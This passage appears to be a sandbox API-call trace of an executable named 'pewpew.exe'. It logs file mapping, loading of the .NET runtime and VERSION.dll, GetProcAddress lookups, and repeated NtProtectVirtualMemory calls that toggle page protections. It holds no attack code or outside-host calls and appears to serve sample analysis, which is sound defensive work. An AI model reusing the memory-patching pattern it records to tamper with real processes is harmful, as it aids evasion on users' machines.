pbstr=0x6eec48*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] ResetEvent (hEvent=0xb8) returned 1 [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] ResetEvent (hEvent=0xb8) returned 1 [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] SetEvent (hEvent=0xbc) returned 1 [0069.281] SetEvent (hEvent=0xb8) returned 1 [0069.281] SetLastError (dwErrCode=0x0) [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] GetCurrentThreadId () returned 0xb0c [0069.281] SetEvent (hEvent=0xbc) returned 1 [0069.282] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] ResetEvent (hEvent=0xb8) returned 1 [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] ResetEvent (hEvent=0xb8) returned 1 [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] SetEvent (hEvent=0xbc) returned 1 [0069.282] SetEvent (hEvent=0xb8) returned 1 [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] GetCurrentThreadId () returned 0xb0c [0069.282] SetEvent (hEvent=0xbc) returned 1 [0069.305] GetCurrentThreadId () returned 0xb0c [0069.305] ResetEvent (hEvent=0xb8) returned 1 [0069.305] GetCurrentThreadId () returned 0xb0c [0069.305] GetCurrentThreadId () returned 0xb0c [0069.305] GetCurrentThreadId () returned 0xb0c [0069.305] GetCurrentThreadId () returned 0xb0c [0069.305] ResetEvent (hEvent=0xb8) returned 1 [0069.305] GetCurrentThreadId () returned 0xb0c [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] SetEvent (hEvent=0xbc) returned 1 [0069.306] SetEvent (hEvent=0xb8) returned 1 [0069.306] CloseHandle (hObject=0x11c) returned 1 [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] ResetEvent (hEvent=0xb8) returned 1 [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] ResetEvent (hEvent=0xb8) returned 1 [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] GetCurrentThreadId () returned 0xb0c [0069.306] SetEvent (hEvent=0xbc) returned 1 [0069.306] SetEvent (hEvent=0xb8) returned 1 [0069.306] CloseHandle (hObject=0x120) returned 1 [0069.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x120 [0069.306] GetLastError () returned 0x0 [0069.306] SysReAllocStringLen (in: pbstr=0x6eec48*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.306] GetThreadLocale () returned 0x409 [0069.306] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.307] GetThreadLocale () returned 0x409 [0069.307] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ee9cc, lpFilePart=0x6ee9c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ee9c8*="pewpew.exe") returned 0x30 [0069.307] SysReAllocStringLen (in: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.307] SysReAllocStringLen (in: pbstr=0x6eebf8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eebf8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.307] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchLength=0x30 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 0x30 [0069.307] SysReAllocStringLen (in: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eec48*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] ResetEvent (hEvent=0xb8) returned 1 [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] ResetEvent (hEvent=0xb8) returned 1 [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] SetEvent (hEvent=0xbc) returned 1 [0069.307] SetEvent (hEvent=0xb8) returned 1 [0069.307] SetLastError (dwErrCode=0x0) [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] GetCurrentThreadId () returned 0xb0c [0069.307] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] SetEvent (hEvent=0xbc) returned 1 [0069.308] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] ResetEvent (hEvent=0xb8) returned 1 [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] ResetEvent (hEvent=0xb8) returned 1 [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] SetEvent (hEvent=0xbc) returned 1 [0069.308] SetEvent (hEvent=0xb8) returned 1 [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] GetCurrentThreadId () returned 0xb0c [0069.308] SetEvent (hEvent=0xbc) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] ResetEvent (hEvent=0xb8) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] ResetEvent (hEvent=0xb8) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] SetEvent (hEvent=0xbc) returned 1 [0069.309] SetEvent (hEvent=0xb8) returned 1 [0069.309] CloseHandle (hObject=0x120) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] ResetEvent (hEvent=0xb8) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] ResetEvent (hEvent=0xb8) returned 1 [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] GetCurrentThreadId () returned 0xb0c [0069.309] SetEvent (hEvent=0xbc) returned 1 [0069.309] SetEvent (hEvent=0xb8) returned 1 [0069.309] CloseHandle (hObject=0x11c) returned 1 [0069.325] SysReAllocStringLen (in: pbstr=0x6eec5c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-0.dll", len=0x26 | out: pbstr=0x6eec5c*="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 1 [0069.325] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 0x26 [0069.325] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0069.339] GetLastError () returned 0x7e [0069.340] SetLastError (dwErrCode=0x7e) [0069.341] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ab4, cbMultiByte=11, lpWideCharStr=0x6eda48, cchWideChar=2047 | out: lpWideCharStr="VERSION.dlln?n?n\x18") returned 11 [0069.341] SysReAllocStringLen (in: pbstr=0x6eea4c*=0x0, psz="VERSION.dll", len=0xb | out: pbstr=0x6eea4c*="VERSION.dll") returned 1 [0069.341] CharLowerBuffW (in: lpsz="VERSION.dll", cchLength=0xb | out: lpsz="version.dll") returned 0xb [0069.341] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x75670000 [0069.342] GetLastError () returned 0x0 [0069.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671030, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.342] GetCurrentProcess () returned 0xffffffff [0069.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671030, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.342] GetCurrentProcess () returned 0xffffffff [0069.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671038, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.342] GetCurrentProcess () returned 0xffffffff [0069.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671038, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.342] GetCurrentProcess () returned 0xffffffff [0069.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x7567103c, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x7567103c, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671070, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x75671070, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x756710d0, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x756710d0, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x756710dc, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x4, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x20) returned 0x0 [0069.343] GetCurrentProcess () returned 0xffffffff [0069.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eea38*=0x756710dc, NumberOfBytesToProtect=0x6eea3c, NewAccessProtection=0x20, OldAccessProtection=0x6eea70 | out: BaseAddress=0x6eea38*=0x75671000, NumberOfBytesToProtect=0x6eea3c, OldAccessProtection=0x6eea70*=0x4) returned 0x0 [0069.344] SysReAllocStringLen (in: pbstr=0x6eea5c*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x6eea5c*="clr.dll") returned 1 [0069.344] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0069.344] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x22) returned 0x74a00002 [0070.261] GetLastError () returned 0x0 [0070.263] FreeLibrary (hLibModule=0x74a00002) returned 1 [0070.264] GetProcAddress (hModule=0x75670000, lpProcName="GetFileVersionInfoW") returned 0x756719f4 [0070.264] SysReAllocStringLen (in: pbstr=0x6eea44*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x6eea44*="clr.dll") returned 1 [0070.264] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0070.264] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x22) returned 0x73ae0002 [0070.266] GetLastError () returned 0x0 [0070.266] FreeLibrary (hLibModule=0x73ae0002) returned 1 [0070.266] GetProcAddress (hModule=0x75670000, lpProcName="VerQueryValueW") returned 0x75671b51 [0070.267] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x118 [0070.267] GetLastError () returned 0x0 [0070.267] SysReAllocStringLen (in: pbstr=0x6ef154*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6ef154*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0070.267] GetThreadLocale () returned 0x409 [0070.267] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0070.267] GetThreadLocale () returned 0x409 [0070.267] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0070.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x6eeed8, lpFilePart=0x6eeed4 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x6eeed4*="clr.dll") returned 0x35 [0070.268] SysReAllocStringLen (in: pbstr=0x6ef154*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6ef154*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0070.268] SysReAllocStringLen (in: pbstr=0x6ef104*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6ef104*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0070.268] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0070.268] SysReAllocStringLen (in: pbstr=0x6ef154*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6ef154*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0070.268] SetLastError (dwErrCode=0x0) [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] ResetEvent (hEvent=0xb8) returned 1 [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] ResetEvent (hEvent=0xb8) returned 1 [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] GetCurrentThreadId () returned 0xb0c [0070.268] SetEvent (hEvent=0xbc) returned 1 [0070.268] SetEvent (hEvent=0xb8) returned 1 [0070.268] CloseHandle (hObject=0x118) returned 1 [0070.271] SysReAllocStringLen (in: pbstr=0x6ef4ac*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x6ef4ac*="clr.dll") returned 1 [0070.271] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0070.271] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x8) returned 0x74a00000 [0071.333] SysReAllocStringLen (in: pbstr=0x6ef13c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ef13c*="kernel32.dll") returned 1 [0071.333] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0071.333] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0071.340] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0071.343] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0071.356] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0071.361] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0071.409] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0071.412] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0071.415] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0071.418] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0071.425] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0071.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0071.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0071.433] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0074.328] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0074.328] FreeLibrary (hLibModule=0x77710000) returned 1 [0074.541] GetLastError () returned 0x7f [0074.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057018, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.542] GetCurrentProcess () returned 0xffffffff [0074.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057018, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.542] GetCurrentProcess () returned 0xffffffff [0074.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057030, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.543] GetCurrentProcess () returned 0xffffffff [0074.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057030, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.543] GetCurrentProcess () returned 0xffffffff [0074.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570d0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.543] GetCurrentProcess () returned 0xffffffff [0074.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570d0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.543] GetCurrentProcess () returned 0xffffffff [0074.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570dc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.543] GetCurrentProcess () returned 0xffffffff [0074.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570dc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.544] GetCurrentProcess () returned 0xffffffff [0074.544] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570e0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.544] GetCurrentProcess () returned 0xffffffff [0074.544] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750570e0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.544] GetCurrentProcess () returned 0xffffffff [0074.544] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505710c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.544] GetCurrentProcess () returned 0xffffffff [0074.544] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505710c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.544] GetCurrentProcess () returned 0xffffffff [0074.544] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057124, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.545] GetCurrentProcess () returned 0xffffffff [0074.545] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057124, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.545] GetCurrentProcess () returned 0xffffffff [0074.545] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571b4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, 